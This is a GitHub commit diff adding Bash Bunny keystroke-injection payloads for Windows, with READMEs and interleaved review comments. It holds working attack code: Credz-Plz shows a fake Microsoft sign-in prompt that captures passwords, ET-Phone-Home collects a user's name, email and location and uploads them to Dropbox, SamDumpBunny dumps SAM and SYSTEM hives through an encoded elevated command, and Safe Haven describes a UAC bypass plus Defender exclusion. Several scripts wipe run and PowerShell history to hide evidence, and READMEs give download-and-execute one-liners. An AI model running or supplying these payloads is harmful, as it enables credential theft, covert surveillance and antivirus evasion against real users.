Merge branch 'hak5:master' into master

pull/533/head
drapl0n 2022-06-15 19:09:29 +05:30 committed by GitHub
commit 37864eeff0
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
73 changed files with 5484 additions and 1 deletions


@ -144,7 +144,7 @@
"/":"02,00,24",
"(":"02,00,25",
")":"02,00,26",
")":"02,00,27",
"=":"02,00,27",
"?":"02,00,2d",
"¡":"02,00,2e",
"¨":"02,00,2f",


@ -0,0 +1,154 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : ET-Phone-Home | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Incident-Response | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This script is meant to recover your device or as an advanced recon tactic to get sensitive info on your target
.DESCRIPTION
This program is used to locate your stolen cable. Or perhaps locate your "stolen" cable if you left it as bait.
This script will get the Name and email associated with the targets microsoft account
Their geo-location will also be grabbed giving you the latitude and longitude of where your device was activated
#>
#------------------------------------------------------------------------------------------------------------------------------------
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_Device-Location.txt"
# Your dropbox access token to exfiltrate information to
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"
#------------------------------------------------------------------------------------------------------------------------------------
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$FN = Get-fullName
#------------------------------------------------------------------------------------------------------------------------------------
function Get-email {
try {
$email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
return $email
}
# If no email is detected function will return backup message for sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "An email was not found"
return "No Email Detected"
-ErrorAction SilentlyContinue
}
}
$EM = Get-email
#------------------------------------------------------------------------------------------------------------------------------------
function Get-GeoLocation{
try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery.
}
if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information'
} else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
}
}
# Write Error is just for troubleshooting
catch {Write-Error "No coordinates found"
return "No Coordinates found"
-ErrorAction SilentlyContinue
}
}
$GL = Get-GeoLocation
#------------------------------------------------------------------------------------------------------------------------------------
echo $FN >> $env:TMP\$FileName
echo $EM >> $env:TMP\$FileName
echo $GL >> $env:TMP\$FileName
#------------------------------------------------------------------------------------------------------------------------------------
# Upload output file to dropbox
$TargetFilePath="/$FileName"
$SourceFilePath="$env:TMP\$FileName"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
#------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
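Review bot: The cleanup block at the end of this script deletes data the script never created: `rm $env:TEMP\* -r -Force` empties the user's whole temp directory and `Clear-RecycleBin -Force` discards files the user may still want to restore. The `reg delete` on `RunMRU` and the removal of the PSReadLine history file additionally erase the host's own record of what ran, which on an authorised test is evidence the client needs to keep. I would drop these steps and remove only the file this script wrote, `Remove-Item -LiteralPath "$env:TMP\$FileName"`. The same block is repeated at the end of the Credz-Plz and Play-WAV scripts later in this commit.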


@ -0,0 +1,117 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# ET Phone Home
A script I put together to locate your stolen devices, or your "stolen" baited devices
## Description
This program is meant to locate your devices. When someone plugs it into their computer
Using a one liner in the run box a script will be downloaded and executed that grabs the Name and email of the associated microsoft account and the
latitude and longitude of where the device was activated. This information is stored in a text document that is then uploaded to your dropbox.
Finally the end of the script will delete the runbox and powershell history and delete the files in the TMP Folder and Recycle Bin.
## Getting Started
### Dependencies
* DropBox - Your Shared link for the intended file
* Windows 7,10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Your device is plugged into the targets computer
* A one liner command in the run box will execute the script on the bash bunny
Something Like What you see below will be in your loot folder:
NAME
EMAIL
LATITUDE AND LONGITUDE
```
Jakoby
jakoby@example.com
Latitude Longitude
-------- ---------
37.778919 -122.416313
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
Kalani
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-ET-Phone-Home)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>


@ -0,0 +1,22 @@
# Title: ET-Phone-Home
# Description: this script will download and execute your locator script to find your device when it is plugged in
# Author: I am Jakoby
# Version: 1.0
# Category: Incident_Response
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\ET-Phone-Home.ps1')"
QUACK ENTER
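Review bot: The header comment says the payload will "download and execute" the locator script, but the `QUACK STRING` line runs `ET-Phone-Home.ps1` directly from the mounted `BashBunny` volume and nothing is downloaded here. The description should say so, for example `# Description: runs ET-Phone-Home.ps1 from the device's storage partition when it is plugged in`. `# Target: Windows 10, 11` also disagrees with the script's own header, which lists `Windows 7,10,11`. The Credz-Plz payload file later in this commit has a similar mismatch: `# Category: Recon` against `Category : Credentials` in its script.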


@ -0,0 +1,178 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Credz-Plz | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Credentials | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This script is meant to trick your target into sharing their credentials through a fake authentication pop up message
.DESCRIPTION
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
This will be followed by a fake authentication ui prompt.
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
Once the target enters their credentials their information will be uploaded to your Bash Bunny
#>
#------------------------------------------------------------------------------------------------------------------------------------
# Creating loot folder
# Get Drive Letter
$bb = (gwmi win32_volume -f 'label=''BashBunny''').Name
# Test if directory exists if not create directory in loot folder to store file
$TARGETDIR = "$bb\loot\Credz-Plz\$env:computername"
if(!(Test-Path -Path $TARGETDIR )){
mkdir $TARGETDIR
}
#------------------------------------------------------------------------------------------------------------------------------------
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_User-Creds.txt"
#------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to generate the ui.prompt you will use to harvest their credentials
#>
function Get-Creds {
do{
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password
if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) {
[System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!")
Get-Creds
}
$creds = $cred.GetNetworkCredential() | fl
return $creds
# ...
$done = $true
} until ($done)
}
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to pause the script until a mouse movement is detected
#>
function Pause-Script{
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
$o=New-Object -ComObject WScript.Shell
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
}
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This script repeadedly presses the capslock button, this snippet will make sure capslock is turned back off
#>
function Caps-Off {
Add-Type -AssemblyName System.Windows.Forms
$caps = [System.Windows.Forms.Control]::IsKeyLocked('CapsLock')
#If true, toggle CapsLock key, to ensure that the script doesn't fail
if ($caps -eq $true){
$key = New-Object -ComObject WScript.Shell
$key.SendKeys('{CapsLock}')
}
}
#----------------------------------------------------------------------------------------------------
<#
.NOTES
This is to call the function to pause the script until a mouse movement is detected then activate the pop-up
#>
Pause-Script
Caps-Off
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.MessageBox]::Show("Unusual sign-in. Please authenticate your Microsoft Account")
$creds = Get-Creds
#------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to save the gathered credentials to a file in the temp directory
#>
echo $creds >> $env:TMP\$FileName
#------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This exfiltrates your loot to the Bash Bunny
#>
Move-Item $env:TMP\$FileName $TARGETDIR\$FileName
#------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
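Review bot: The value returned by `Get-Creds` is the formatted output of `GetNetworkCredential()`, so `echo $creds >> $env:TMP\$FileName` and the following `Move-Item` write a user's real password in clear text, first to the temp directory and then to removable storage. For an authorised awareness test the finding is that the user submitted the prompt, not the secret itself, so I would record the user name and a timestamp only and never write the `Password` field to disk. The header also says `Mode : HID`, while the script depends on the storage mode to find the `BashBunny` volume; the comment block should list both.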


@ -0,0 +1,102 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Credz-Plz
A script used to prompt the target to enter their creds to later be exfiltrated with dropbox.
## Description
A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account"
This will be followed by a fake authentication ui prompt.
If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up
Once the target enters their credentials their information will be uploaded to your dropbox for collection
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/unusual-sign-in.jpg)
![alt text](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG/Payloads/OMG-Credz-Plz/sign-in.jpg)
## Getting Started
### Dependencies
* DropBox or other file sharing service - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>


@ -0,0 +1,22 @@
# Title: Credz-Plz
# Description: A script used to prompt the target to enter their creds to later be exfiltrated to the Bash Bunny
# Author: I am Jakoby
# Version: 1.0
# Category: Recon
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Credz-Plz.ps1')"
QUACK ENTER

Binary file not shown.


Binary file not shown.



@ -0,0 +1,21 @@
**Title: SamDumpBunny**
<p>Author: 0iphor13<br>
OS: Windows<br>
Version: 1.0<br>
**What is SamDumpBunny?**
#
<p>SamDumpBunny dumps the users sam and system hive and compresses them into a zip file.<br>
Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
**Instruction:**
1. Plug in your Bashbunny and wait a few seconds
2. Unzip the exfiltrated zip file onto your machine.
3. Use a tool like samdump2 on your machine to extract the users hashes.
> `samdump2 BunnySys BunnySam`
![alt text](https://github.com/0iphor13/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)


@ -0,0 +1,53 @@
#!/bin/bash
#
# Title: SamDumpBunny
# Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
# Author: 0iphor13
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage
LED SETUP
Q DELAY 500
GET SWITCH_POSITION
DUCKY_LANG de
Q DELAY 500
ATTACKMODE HID STORAGE
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
LED STAGE1
Q DELAY 1000
RUN WIN "powershell Start-Process powershell -Verb runAs"
Q ENTER
Q DELAY 1000
#Shortcut for pressing yes - Needs to be adapted for your language (ger=ALT j;engl=ALT y; etc...)
Q ALT j
Q DELAY 250
Q DELAY 250
Q STRING "powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAQgB1AG4AbgB5AFMAYQBtADsAcgBlAGcAIABzAGEAdgBlAC"
Q DELAY 250
Q STRING "AAaABrAGwAbQBcAHMAeQBzAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgA"
Q DELAY 250
Q STRING "CIAJABQAFcARABcAEIAdQBuAG4AeQBTAHkAcwAiACwAIAAiACQAUABXAEQAXABCAHUAbgBuAHkAUwBhAG0AIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBu"
Q DELAY 250
Q STRING "AFAAYQB0AGgAIABTAGEAbQBEAHUAbQBwAEIAdQBuAG4AeQAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAcgBl"
Q DELAY 250
Q STRING "AG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAYQBtADsAZQB4AGkAdAA="
Q DELAY 250
Q STRING ";mv SamDumpBunny.zip ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
Q DELAY 250
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';Start-Sleep 3;(New-Object -comObject Shel"
Q DELAY 250
Q STRING "l.Application).Namespace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
Q DELAY 300
Q ENTER
LED FINISH
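Review bot: The command typed into the elevated console by the five `Q STRING` lines that follow `powershell.exe -NoP -enc` is an opaque Base64 blob with no comment saying what it decodes to, so a reviewer cannot tell what will run with administrator rights without decoding it by hand. I would add a comment block above it carrying the decoded text; it appears to be a `reg save` of the SAM and SYSTEM hives followed by `Compress-Archive` and removal of the two intermediate files, but that should be confirmed against the blob. The obfuscated `FromBase64String`/`DeflateStream` one-liner in the Safe-Haven DuckyScript file later in this commit has the same problem, and its `REM Description` only summarises the effect. `DUCKY_LANG de` is also hard-coded alongside `Q ALT j`, and only the latter is flagged as layout-specific in the comments.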


@ -0,0 +1,89 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : Play-WAV | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Execution | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# Dependencies : Dropbox | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.NOTES
This script requires you to have a DropBox account or another file hosting service
.DESCRIPTION
This program downloads a sound from your DropBox
Turns the volume to max level on victims PC
Pauses the script until a mouse movement is detected
Then plays the sound with nothing popping up catching your victim off guard
Finally a few lines of script are executed to empty TMP folder, clear Run and Powershell history
#>
############################################################################################################################################################
# Download Sound (When using your own link "dl=0" needs to be changed to "dl=1")
iwr https:// <Your DropBox shared link intended for file> ?dl=1 -O $env:TMP\e.wav
############################################################################################################################################################
# This turns the volume up to max level
$k=[Math]::Ceiling(100/2);$o=New-Object -ComObject WScript.Shell;for($i = 0;$i -lt $k;$i++){$o.SendKeys([char] 175)}
############################################################################################################################################################
# This while loop will constantly check if the mouse has been moved
# if the mouse has not moved "SCROLLLOCK" will be pressed to prevent screen from turning off
# it will then sleep for the indicated number of seconds and check again
Add-Type -AssemblyName System.Windows.Forms
$originalPOS = [System.Windows.Forms.Cursor]::Position.X
while (1) {
$pauseTime = 3
if ([Windows.Forms.Cursor]::Position.X -ne $originalPOS){
break
}
else {
$o.SendKeys("{CAPSLOCK}");Start-Sleep -Seconds $pauseTime
}
}
############################################################################################################################################################
# Play Sound
$PlayWav=New-Object System.Media.SoundPlayer;$PlayWav.SoundLocation="$env:TMP\e.wav";$PlayWav.playsync()
############################################################################################################################################################
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue
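Review bot: The comment above the wait loop says `SCROLLLOCK` is pressed while the mouse is idle, but the loop sends `{CAPSLOCK}`; the comment should read `# if the mouse has not moved "CAPSLOCK" will be toggled to prevent screen from turning off`. Because the key is toggled an unknown number of times and this script has no equivalent of the `Caps-Off` function in the Credz-Plz script, the user's Caps Lock state can be left changed when the script ends. The download line with `https:// <Your DropBox shared link intended for file> ?dl=1` is a placeholder that does not parse as written, which the `.NOTES` block should state explicitly.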


@ -0,0 +1,99 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Play-WAV
A script used to download a WAV file and play it after a mouse movement is detected
## Description
This program starts off by using an Invoke-WebRequest to download a WAV file
The system volume is then turned up to the max level
Then the script will be paused until a mouse movement is detected
After one is the WAV file will be played
## Getting Started
### Dependencies
* DropBox - Your Shared link for the intended file
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download your WAV file
```
powershell -w h -NoP -NonI -Exec Bypass iwr https:// < Your Shared link for the intended file> ?dl=1 -O $env:TMP\e.wav
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/BashBunny/Payloads/BB-Play-WAV)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>


@ -0,0 +1,26 @@
# Title: Play-WAV
# Description: This payload will download a WAV file, pause until a mouse movement is detected then play the sound effect
# Author: I am Jakoby
# Version: 1.0
# Category: Execution
# Attackmodes: HID, Storage
# Target: Windows 10, 11
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID STORAGE
LED STAGE1
QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\Play-WAV.ps1')"
QUACK ENTER


@ -0,0 +1,97 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# Safe Haven
A script used to open an elevated powershell console and created a folder ignored by the AntiVirus
## Description
This is a UAC bypass payload that will open an elevated powershell console
Next a Directory called "safe" will be generated in your Documents Directory
The "safe" directory will be added to the Window's Defender Exclusion list
The AntiVirus will ignore all files downloaded to or ran from here
## Getting Started
### Dependencies
* Windows 10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Plug in your device
* A keystroke injection based payload will run
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
